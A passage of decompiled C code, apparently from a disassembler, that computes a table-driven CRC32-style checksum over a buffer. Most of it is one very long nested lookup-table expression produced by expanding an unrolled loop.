+ ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x18) * 4) ^  *(0x4141c8 + (_t162 & 0x000000ff) * 4) ^ _t257[6]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t248 >> 0x18) * 4) ^  *(0x4141c8 + (_t248 & 0x000000ff) * 4) ^ _t257[7];
						_t257 =  &(_t257[8]);
						_t98 =  *(0x4149c8 + (( *(0x4149c8 + (_t167 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (_t167 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t167 >> 0x18) * 4) ^  *(0x4141c8 + (_t167 & 0x000000ff) * 4) ^  *_t257) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (_t167 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (_t167 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t167 >> 0x18) * 4) ^  *(0x4141c8 + (_t167 & 0x000000ff) * 4) ^  *_t257) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (_t167 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (_t167 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t167 >> 0x18) * 4) ^  *(0x4141c8 + (_t167 & 0x000000ff) * 4) ^  *_t257) >> 0x18) * 4) ^  *(0x4141c8 + (_t253 & 0x000000ff) * 4);
						_t262 = _t262 - 1;
					} while (_t262 != 0);
				}
				if(_t259 >= 4) {
					_t152 = _t259 >> 2;
					do {
						_t103 = _t98 ^ _t257[1];
						_t257 =  &(_t257[1]);
						_t259 = _t259 - 4;
						_t98 =  *(0x4149c8 + (_t103 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (_t103 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (_t103 >> 0x18) * 4) ^  *(0x4141c8 + (_t103 & 0x000000ff) * 4);
						_t152 = _t152 - 1;
					} while (_t152 != 0);
				}
				_t258 =  &(_t257[1]);
				if(_t259 != 0) {
					do {
						_t178 =  *_t258 & 0x000000ff;
						_t258 =  &(_t258[1]);
						_t98 = _t98 << 0x00000008 ^  *(0x4141c8 + (_t98 >> 0x00000018 ^ _t178) * 4);
						_t259 = _t259 - 1;
